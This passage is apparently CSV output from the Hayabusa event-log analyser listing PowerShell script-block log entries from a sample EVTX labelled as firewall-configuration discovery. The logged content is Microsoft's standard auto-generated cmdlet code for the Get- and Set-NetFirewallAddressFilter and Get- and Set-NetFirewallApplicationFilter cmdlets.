'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallAddressFilter' function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallAddressFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleFilterByAddress', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LocalIP')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('RemoteIP')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallAddressFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallApplicationFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetApplicationFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Program}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Package}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Program') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Program}) $__cmdletization_queryBuilder.FilterByProperty('AppPath', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Package') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Package}) $__cmdletization_queryBuilder.FilterByProperty('Package', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByApplication', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallApplicationFilter' function Set-NetFirewallApplicationFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 